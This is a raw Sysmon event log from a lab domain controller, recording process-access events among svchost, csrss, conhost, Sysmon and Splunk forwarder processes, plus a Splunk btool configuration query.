13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5400-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E5B-6005-5300-00000000A301}35483528C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E5B-6005-5400-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.026{59A5CD1D-8E5B-6005-5400-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E5B-6005-5300-00000000A301}3548C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000002025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5300-00000000A301}3548C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5300-00000000A301}3548C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E5B-6005-5200-00000000A301}35363632C:\Windows\system32\cmd.exe{59A5CD1D-8E5B-6005-5300-00000000A301}3548C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.019{59A5CD1D-8E5B-6005-5300-00000000A301}3548C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E5B-6005-5200-00000000A301}3536C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000002012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5200-00000000A301}3536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 